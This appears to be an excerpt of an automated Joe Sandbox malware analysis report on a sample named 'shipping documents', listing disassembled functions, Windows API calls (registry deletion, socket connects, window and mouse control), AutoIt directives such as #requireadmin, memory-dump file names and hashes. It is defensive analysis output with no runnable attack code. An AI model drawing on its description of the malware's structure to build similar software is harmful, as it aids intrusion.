RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 006D125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006D1286
FreeLibrary.KERNEL32(00000000), ref: 006D133D

Part of subcall function 006D122D: RegCloseKey.ADVAPI32(?), ref: 006D12A3
Part of subcall function 006D122D: FreeLibrary.KERNEL32(?), ref: 006D12F5
Part of subcall function 006D122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006D1318

RegDeleteKeyW.ADVAPI32(?,?), ref: 006D12E0

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 0341e0e479a507ac939284dc71ca1dfdc3043d1170e8010e8f62ce7a10235dfe
Instruction ID: ce570b751f2e47a43343bf5dd3e59363405be056e3b86ba432864800f8a372da
Opcode Fuzzy Hash: 0341e0e479a507ac939284dc71ca1dfdc3043d1170e8010e8f62ce7a10235dfe
Instruction Fuzzy Hash: EB312BB1D01109BFDB149B90DC89EFEB7BDEF09300F00416BE512E6251EAB59F859AA0

Function 006D653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006D655B
GetWindowLongW.USER32(013256F8,000000F0), ref: 006D658E
GetWindowLongW.USER32(013256F8,000000F0), ref: 006D65C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 006D65F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006D661F
GetWindowLongW.USER32(00000000,000000F0), ref: 006D6630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006D664A

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: b17121a1ac2f0ec73e525f880f90ec4a969578c9a7cfdfed5e7ac2c2cadfd508
Instruction ID: 87a50de1f13e9bffea21b9bc7a277a0d4601c6cb36309e7a1692f6bbe01c5925
Opcode Fuzzy Hash: b17121a1ac2f0ec73e525f880f90ec4a969578c9a7cfdfed5e7ac2c2cadfd508
Instruction Fuzzy Hash: 0731F330A05150AFDB20CF18EC85FA537E2FB4A710F1981AAF5118B3B6CB61E880DB55

Function 006C6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006C80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006C80CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006C64D9
WSAGetLastError.WSOCK32(00000000), ref: 006C64E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006C6521
connect.WSOCK32(00000000,?,00000010), ref: 006C652A
WSAGetLastError.WSOCK32 ref: 006C6534
closesocket.WSOCK32(00000000), ref: 006C655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006C6576

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 45a18abbc1bb620665de8c6caf0daa43ffbe908047e231491c220d124b9b36a8
Instruction ID: da9d3cbb50ec6a1f527d04b1efe762146812625ddb6d9a1174df2468a4ba961f
Opcode Fuzzy Hash: 45a18abbc1bb620665de8c6caf0daa43ffbe908047e231491c220d124b9b36a8
Instruction Fuzzy Hash: 7A31A131600118AFDB10AF24DC85FBE7BBAEB44715F04802EFD0697291CB70AD08CB65

Function 006AE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006AE0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006AE120
SysAllocString.OLEAUT32(00000000), ref: 006AE123
SysAllocString.OLEAUT32 ref: 006AE144
SysFreeString.OLEAUT32 ref: 006AE14D
StringFromGUID2.OLE32(?,?,00000028), ref: 006AE167
SysAllocString.OLEAUT32(?), ref: 006AE175

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 2b07ef5f4859e44e7c0157899d5744b4b5ba36d4d5b5b2c029a3ed8e14456b47
Instruction ID: e1ad44cf851af13e9ad2b06235cae7bed592b2e0e3d970feaa3ed2ff24bc303d
Opcode Fuzzy Hash: 2b07ef5f4859e44e7c0157899d5744b4b5ba36d4d5b5b2c029a3ed8e14456b47
Instruction Fuzzy Hash: 2E215335605118AFDB10BFA8DC88DAB77EEEB0A760B108136F955CB261DA71DC41CF64

Function 006AFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 006AFB81
__wcsnicmp.LIBCMT ref: 006AFBA2
__wcsnicmp.LIBCMT ref: 006AFBBC

Strings

#OnAutoItStartRegister, xrefs: 006AFBB6
#requireadmin, xrefs: 006AFB9C
#notrayicon, xrefs: 006AFB79

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 1fdc47b1123e6521965e01d062f9161adc87f1f8f87f7901a1faa1107469dd8b
Instruction ID: 9f4e3b932a58aa385d371c5bf1a128ff4708952b00e1d3b27e04bc7244e8a49f
Opcode Fuzzy Hash: 1fdc47b1123e6521965e01d062f9161adc87f1f8f87f7901a1faa1107469dd8b
Instruction Fuzzy Hash: 48216A3210025566D230B775DC12FE7B39FEF23310F14803AF88A86281FB51AD82D6AA

Function 006D783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00651D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00651D73
Part of subcall function 00651D35: GetStockObject.GDI32(00000011), ref: 00651D87
Part of subcall function 00651D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00651D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006D78A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006D78AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006D78B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006D78C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006D78D4

Strings

Msctls_Progress32, xrefs: 006D7872

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: cb8ce9dd7aa14fe8ac308f4205f3eed47db567f6b69fd3003dab50066a91bc19
Instruction ID: f1738ef433580fe4278b387eb0b8449fdee7a89367dda0ba18e4f55cc01b2463
Opcode Fuzzy Hash: cb8ce9dd7aa14fe8ac308f4205f3eed47db567f6b69fd3003dab50066a91bc19
Instruction Fuzzy Hash: 041193B1510119BFEF159F60CC85EE77F6EEF08758F014125BA04A6190D7729C21DBA4

Function 006741C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00674292,?), ref: 006741E3
GetProcAddress.KERNEL32(00000000), ref: 006741EA
EncodePointer.KERNEL32(00000000), ref: 006741F6
DecodePointer.KERNEL32(00000001,00674292,?), ref: 00674213

Strings

combase.dll, xrefs: 006741DE
RoInitialize, xrefs: 006741D2

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 030858d88be49b5e660ae7307abbde8b703b0f7d6f6ad9630cf9d3fb7bd233b1
Instruction ID: bc3aaceb688ddc592e7b644c230df140b8157da180804abee169fcbaf6ea5a73
Opcode Fuzzy Hash: 030858d88be49b5e660ae7307abbde8b703b0f7d6f6ad9630cf9d3fb7bd233b1
Instruction Fuzzy Hash: 82E092B0992305BEDF101BB5EC0CB943697BB10702F02D424F512D50E0DBB880919F04

Function 0067429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006741B8), ref: 006742B8
GetProcAddress.KERNEL32(00000000), ref: 006742BF
EncodePointer.KERNEL32(00000000), ref: 006742CA
DecodePointer.KERNEL32(006741B8), ref: 006742E5

Strings

combase.dll, xrefs: 006742B3
RoUninitialize, xrefs: 006742A7

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: cf5325a8c72bdb434a4d8e40a652be7541151297aaeae443c01749a97a1a0415
Instruction ID: 6d6fd9e668d584a22494724736abee33d1f18538b4424cdb4c9f5ebf0290d4f2
Opcode Fuzzy Hash: cf5325a8c72bdb434a4d8e40a652be7541151297aaeae443c01749a97a1a0415
Instruction Fuzzy Hash: 4EE0BF78982305BBEB119B65EC0DB853BA7BB14742F15D025F112F11E0CBB84654DA5C

Function 006B675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006B68AD
_memmove.LIBCMT ref: 006B67E8

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

_memmove.LIBCMT ref: 006B685B
_memmove.LIBCMT ref: 006B6942
_memmove.LIBCMT ref: 006B695B
_memmove.LIBCMT ref: 006B6977

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
Instruction ID: 761eba7be322c25d9d4594d1093c869db08e6535eeab02c74eb2c6c76d1edafb
Opcode Fuzzy Hash: b6af34302f73e7cc86d124cdaa6c703dbf7dfb6507262c8ff84fb63fda3a9fb8
Instruction Fuzzy Hash: 7061AD7050065A9BDF51EF24CC81EFE37AAAF05308F08455DFC5A5B292DB38AD85CB64

Function 006D046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

Part of subcall function 006D10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006D0038,?,?), ref: 006D10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006D0548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006D0588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 006D05AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006D05D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 006D0617
RegCloseKey.ADVAPI32(00000000), ref: 006D0624

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 2c165b34ade3296d091e639f70f72c4f20780ee7a0bfee424f786d6a947da634
Instruction ID: 0bee1712739dded84fb20414b3813dfe45358170f18f638362635a26de849eac
Opcode Fuzzy Hash: 2c165b34ade3296d091e639f70f72c4f20780ee7a0bfee424f786d6a947da634
Instruction Fuzzy Hash: D1515A31908240AFD714EF24D895E6FBBEAFF89314F04491EF946872A1DB31E909CB56

Function 006D5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 006D5A82
GetMenuItemCount.USER32(00000000), ref: 006D5AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006D5AE1
GetMenuItemID.USER32(?,?), ref: 006D5B50
GetSubMenu.USER32(?,?), ref: 006D5B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 006D5BAF

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 1a3ae9a2688a6ee2337f7ebcb60377dfb01cc8a4df0e54e777aa4c74ecd232f7
Instruction ID: 14104c963409a6037035650ac4fe49e068ac87526cf139ba72589e34bd175f0f
Opcode Fuzzy Hash: 1a3ae9a2688a6ee2337f7ebcb60377dfb01cc8a4df0e54e777aa4c74ecd232f7
Instruction Fuzzy Hash: CA516E35E00629EFCF11EF64C855AEEB7B6EF48310F14446AE816BB351CB30AE418B95

Function 006AF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 006AF3F7
VariantClear.OLEAUT32(00000013), ref: 006AF469
VariantClear.OLEAUT32(00000000), ref: 006AF4C4
_memmove.LIBCMT ref: 006AF4EE
VariantClear.OLEAUT32(?), ref: 006AF53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 006AF569

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: a57e873efb35ede4d1b48744986da819ced38bd24658e511c7208572462d4ba4
Instruction ID: 7e1293e3453825b1a3840b1fdc3220fdc40c5635b7a4298c402c9c65cb77ae79
Opcode Fuzzy Hash: a57e873efb35ede4d1b48744986da819ced38bd24658e511c7208572462d4ba4
Instruction Fuzzy Hash: FE5169B5A00209EFCB10DF58D884AAAB7F9FF4D354B15856AE959DB301D730E912CFA0

Function 006B26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006B2747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B2792
IsMenu.USER32(00000000), ref: 006B27B2
CreatePopupMenu.USER32 ref: 006B27E6
GetMenuItemCount.USER32(000000FF), ref: 006B2844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 006B2875

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 7ba29a9bc7c89a3182bb9cd861de1c47e66ccd1b73b8ad2e2b8800804a7129de
Instruction ID: c85f0cc99416406ef35336c3dc92e0180656bafd7eca6932a1b61355973680ff
Opcode Fuzzy Hash: 7ba29a9bc7c89a3182bb9cd861de1c47e66ccd1b73b8ad2e2b8800804a7129de
Instruction Fuzzy Hash: 9151C2B0A0034BDFDF25CF68D898BEEBBF6AF44314F104269E4159B291D7708988CB51

Function 00651765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0065179A
GetWindowRect.USER32(?,?), ref: 006517FE
ScreenToClient.USER32(?,?), ref: 0065181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0065182C
EndPaint.USER32(?,?), ref: 00651876

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 7591f2e0e7694158c299181d93b4b84fda7bfdf80c928c8a05f93c078ca0d258
Instruction ID: 922fce7c525d1e808d18d836b54472243866ea403a92bebfd0c4abfd5e243381
Opcode Fuzzy Hash: 7591f2e0e7694158c299181d93b4b84fda7bfdf80c928c8a05f93c078ca0d258
Instruction Fuzzy Hash: 6E41BE70500301AFD720DF28CC84FBA7BEAEB4A725F044669F9A58B2A1C7319849DB61

Function 006DB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(007167B0,00000000,013256F8,?,?,007167B0,?,006DB862,?,?), ref: 006DB9CC
EnableWindow.USER32(00000000,00000000), ref: 006DB9F0
ShowWindow.USER32(007167B0,00000000,013256F8,?,?,007167B0,?,006DB862,?,?), ref: 006DBA50
ShowWindow.USER32(00000000,00000004,?,006DB862,?,?), ref: 006DBA62
EnableWindow.USER32(00000000,00000001), ref: 006DBA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 006DBAA9

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 7dac9ec9cc19d23f07e71dc67330e1bd7a52a21a2d2f40872cc84d3e311b76c0
Instruction ID: f6e5876c44f531dc539c88eac996e4454c304935dd6ba9f9595cf59cc52debc5
Opcode Fuzzy Hash: 7dac9ec9cc19d23f07e71dc67330e1bd7a52a21a2d2f40872cc84d3e311b76c0
Instruction Fuzzy Hash: D3414134A01281EFDB21CF14C499BD57BE2FB0A310F1A51ABFA498F7A6C731A845CB51

Function 006C73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,006C5134,?,?,00000000,00000001), ref: 006C73BF

Part of subcall function 006C3C94: GetWindowRect.USER32(?,?), ref: 006C3CA7

GetDesktopWindow.USER32 ref: 006C73E9
GetWindowRect.USER32(00000000), ref: 006C73F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 006C7422

Part of subcall function 006B54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B555E

GetCursorPos.USER32(?), ref: 006C744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 006C74AC

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: e7f145d062a78da455acdb3151d341e759e2f72491656f189dec9dd1ad48e00e
Instruction ID: 9feec843ccbeb3ab92d24eba29853008c56694bd36474bf446d1a7ba335fa8d8
Opcode Fuzzy Hash: e7f145d062a78da455acdb3151d341e759e2f72491656f189dec9dd1ad48e00e
Instruction Fuzzy Hash: 9F31E672509305ABD724DF14D849FABBBEAFF88314F00491EF58997191CB30EA49CB92

Function 006A8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006A8608
Part of subcall function 006A85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006A8612
